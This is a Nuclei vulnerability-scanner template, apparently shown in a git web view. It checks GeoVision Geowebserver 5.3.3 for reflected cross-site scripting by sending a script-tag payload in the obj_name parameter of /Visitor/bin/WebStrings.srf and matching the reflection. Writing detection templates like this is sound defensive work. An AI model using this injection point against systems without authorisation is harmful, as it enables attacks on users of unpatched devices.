nuclei-templates/vulnerabilities/other/geovision-geowebserver-xss....

29 lines
676 B
YAML
Raw Normal View History

2021-08-17 22:20:39 +00:00
id: geowebserver-xss
info:
name: GeoVision Geowebserver 5.3.3 - XSS
author: madrobot
severity: medium
reference: https://www.exploit-db.com/exploits/50211
tags: geowebserver,xss
requests:
- raw:
2021-08-18 09:18:34 +00:00
- |
2021-08-17 22:20:39 +00:00
GET /Visitor/bin/WebStrings.srf?file=&obj_name=<script>test</script> HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: */*
matchers-condition: and
matchers:
- type: regex
regex:
- "<script>test</script>"
part: body
- type: status
status:
- 200